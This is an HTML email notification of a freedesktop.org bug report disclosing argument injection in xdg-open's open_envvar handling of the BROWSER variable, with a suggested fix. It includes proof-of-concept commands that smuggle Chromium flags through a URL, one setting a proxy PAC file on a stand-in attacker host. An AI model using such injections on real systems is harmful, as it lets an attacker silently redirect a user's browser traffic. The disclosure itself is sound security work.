<html>
    <head>
      <base href="https://bugs.freedesktop.org/">
    </head>
    <body><table border="1" cellspacing="0" cellpadding="8">
        <tr>
          <th>Bug ID</th>
          <td><a class="bz_bug_link 
          bz_status_NEW "
   title="NEW - Argument injection in xdg-open open_envvar"
   href="https://bugs.freedesktop.org/show_bug.cgi?id=103807">103807</a>
          </td>
        </tr>

        <tr>
          <th>Summary</th>
          <td>Argument injection in xdg-open open_envvar
          </td>
        </tr>

        <tr>
          <th>Product</th>
          <td>Portland
          </td>
        </tr>

        <tr>
          <th>Version</th>
          <td>unspecified
          </td>
        </tr>

        <tr>
          <th>Hardware</th>
          <td>All
          </td>
        </tr>

        <tr>
          <th>OS</th>
          <td>All
          </td>
        </tr>

        <tr>
          <th>Status</th>
          <td>NEW
          </td>
        </tr>

        <tr>
          <th>Severity</th>
          <td>major
          </td>
        </tr>

        <tr>
          <th>Priority</th>
          <td>medium
          </td>
        </tr>

        <tr>
          <th>Component</th>
          <td>xdg-utils
          </td>
        </tr>

        <tr>
          <th>Assignee</th>
          <td>portland-bugs@lists.freedesktop.org
          </td>
        </tr>

        <tr>
          <th>Reporter</th>
          <td>gabriel.corona@enst-bretagne.fr
          </td>
        </tr></table>
      <p>
        <div>
        <pre>xdg-open open_envvar is vulnerable to argument injection when BROWSER contains
%s:

This command:

    BROWSER="chromium %s" xdg-open "<a href="http://www.example.com/">http://www.example.com/</a> --incognito"

will open incognito mode of chromium (when open_envvar mode is used).

The corresponding code is:

    if echo "$browser" | grep -q %s; then
      $(printf "$browser" "$1")

This could be abused to silently set chromium proxy configuration which would
allow an attacker to redirect all of the browser traffic through a server under
his control:

    BROWSER="chromium %s" xdg-open "<a href="http://www.example.com/">http://www.example.com/</a>
--proxy-pac-url=<a href="http://dangerous.example.com/proxy.pac">http://dangerous.example.com/proxy.pac</a>"

One possible solution would be to URI-encode IFS characters in $1.

See <a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881767">https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881767</a> for a similar
problem in sensible-browser.</pre>
        </div>
      </p>


      <hr>
      <span>You are receiving this mail because:</span>

      <ul>
          <li>You are the assignee for the bug.</li>
      </ul>
    </body>
</html>